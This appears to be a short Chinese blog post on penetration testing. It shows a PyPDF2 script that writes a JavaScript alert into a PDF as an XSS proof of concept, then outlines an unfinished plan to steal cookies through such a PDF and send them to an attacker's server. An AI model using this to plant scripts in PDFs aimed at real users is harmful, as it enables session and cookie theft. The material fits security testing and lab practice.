【web安全】PDF写入XSS攻击

一开始研究用现成的PDF编辑器工具写入，发现又要VIP，又比较繁琐

还不如用 Python装一个库，写代码来的快捷

所以采用了PyPDF2这个库来写入

基础用法

在渗透测试中，能触发弹窗就算是一个漏洞了

# 安装第三方库
pip install PyPDF2 -i https://pypi.tuna.tsinghua.edu.cn/simple

from PyPDF2 import PdfReader,PdfWriter

# 新建一个PDF文档
new_PDF = PdfWriter()

# 写入JavaScript代码
new_PDF.add_js("app.alert(123);")

# 打开一个新的PDF文件，二进制方式写入
f = open("XSS2.pdf","wb")

# 写进PDF，其实这里没看懂，为什么是要反过来写？
new_PDF.write(f)

# 最后保存关闭文件
f.close() 

进阶用法

这里要注重实战，搭建一个靶场进行实战

首先打开网站，下发Cookie，然后再到打开PDF反弹Cookie

再模拟黑客用服务器接收Cookie，登录，一条龙

有空再写